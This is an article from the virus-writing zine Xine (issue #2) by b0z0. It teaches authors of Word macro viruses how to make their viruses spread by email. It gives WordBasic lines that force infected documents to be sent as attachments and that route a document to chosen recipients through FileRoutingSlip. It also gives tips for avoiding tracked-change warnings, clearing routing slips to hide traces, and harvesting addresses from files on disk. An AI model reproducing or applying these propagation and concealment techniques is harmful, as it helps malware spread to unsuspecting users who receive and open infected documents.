Copy Link
Add to Bookmark
Report
xine-2.014
/-----------------------------\
| Xine - issue #2 - Phile 014 |
\-----------------------------/
Introduction to mail features with Word
by b0z0
0-Intro
-------
Hi, this is a short quite boring text about mail support in Word. Since
Word may be also used as a mail editor it would be definitely cool that
wordmacro viruses may expand themselves via email. I'll try to explain in
a few words how a virus may be email compatible.
This text isn't likely to cover any aspect of Word by mail, but i'll
rather talk just about what i noticed when playing with Word months and
months ago. Since i leaved the whole stuff a lot of time ago (and i don't
think i'll get it back out :) ) some things may be a little too fastly
described, so just strike a few F1-s if you're going to implement this
things in your virus... of course the entire mail routines has been fully
tested (and approved :) ) on a network.
Short notes about mail support in wordbasic
-------------------------------------------
Some Word users may use Word also as a mail editor. Infact with Word a
user can also send documents as emails to other users. As far as i know
anyway there aren't a lot of users that uses Word as mail editor. Virus
mailing is quite difficoult to do in an efficent way, but there are some
thing that you may add to your virus that will at least partially give the
power to replicate by email.
Ah, pay attention, mail support isn't avaiable in Word 6.0, so take care.
-) Forcing the user to attach
-----------------------------
The most simple way to try to force the user to send the Word document as
an attachment and not as a simple text file (this of course mean that if
the file is infected then Word will send the entire document will all of
your macros) is to force in the options the MailAsAttachment feature. This
is very simply done in your macro with a:
ToolsOptionsGeneral .SendMailAttach = 1
In this way when the user will try to send a mail with the SendMail from
the File menu Word will automatically put the DOC as an attachment instead
of converting it to plain text. Of course you can decide if force the
MailAsAttachment every time that the user sends a mail (so you can just
this in the FileSendMail macro before calling the real one) or just
randomly. Of course if the user will try to disable the SendMailAttach but
will not have success he may became suspicious, on the other side a heavy
forcing may be more effective.
-) Sending a Mail outside
-------------------------
With Word you can of course also send a mail to outside. In the way i am
going to explain here you will not send directly a mail, but you'll rather
route this document to one or more recipients.
FileRoutingSlip .Subject = "GoodTimes, hehehe", \
.Message = "Read or DIE!", .AllAtOnce = 1, .Addslip
FileRoutingSlip .Address = "me@here.com", .Addrecipient
FileRoutingSlip .Address = "you@cia.gov", .Addrecipient
FileRoutingSlip .RouteDocument
Let's examine the example. In the first line (the "\" only splits the line
beacuse it was too long ;) ) we define:
- the subject of the message ("GoodTimes, hehehe" :) )
- the message that will be included in the mail
- the way that the message will be sent. "AllAtOnce = 1" means
that word will do a Cc: to all the recipients at once instead
of sending just an email to the first.
Finally in the first line with ".Addslip" we define that we are adding a
slip to the document (a routing slip as called in Word is such a method to
route a document between various persons, so anyone can see how it's going
the work and correct errors or something like. Word can manage to
automatically send the document with a routing slip at some events, like
save or close).
In the second and the third line we just add two recipients and, finally,
in the last line of the example we send the document. That's quite easy in
this way, isn't it? :) When sending documents in this way the document
will be always sent as an attachment, indifferently from the options.
The user(s) will recive a mail with the document attachment that looks
like (just body included):
----------->[snip]<------------
Read or DIE!
The document below has a routing slip. When you are done reviewing this
document, choose Send from the Word File menu to return the document to
its sender.
----------->[snip]<------------
After our message as you can see the note that the document has a routing
slip, but don't worry, Word users will read this after the DOC reading :)
Another important thing concerning the FileRoutingSlip command is the
".Protect = x" (where x can be a number from 0 to 3). This argument
specifies the type of protection that the document has. If the document
has no protection (0) then the sender can change its contents without
any problem. If the protection is set at 1 then the changes will be
noticed (with another color) and so on.... If you forgot to disable
protection (".Protect = 0") then after you will send with your macro the
documents around, the user, at the first change, will notice that
something changed ;) the changes infact will be signaled in underscore
font. So DON'T forgot to disable protection!
After you routed the message anyway the routing slip for the document
will still remain active, so if the user will go in the File menu at the
EditRoutingSlip he may see that someone modified (or created) the routing
slip. Of course you can delete the entire routing slip for the current
document:
FileRoutingSlip .ClearSlip
Or alternatively delete just the recipients:
FileRoutingSlip .ClearRecipients
There isn't a good way to delete just one recipient that you may have
added.
As for this way to expand the virus activities by email you must pay
attention that you won't alert the user in any way. Infact you can just
try to send emails around without to know if even the user has configured
the mail system. So be careful WHERE you put a macro like this. To be
quite sure that it will work you may put this after the FileSendMail,
supposing that if he sends mail then the system is maybe also configured
for that.
For the addresses: well, be creative! :) search in the document, in some
various standard files on the disk... look somewhere for them ;)
-) Final words about email diffusion
------------------------------------
As you may noticed mail distribuition with Word isn't very reailable. It
may be very risky to include macros that sends mail around. Warning and
errors may be too difficoult to handle.
Anyway the first method (very simple and not as much efficent) may be
used by any macrovirus. Infact the user won't care too much about that (i
think) and also you don't have to risk that the mail stuff isn't
configured, just because you just set a variable in the options. In this
way at least in some cases your virus will be fully email compatible ;)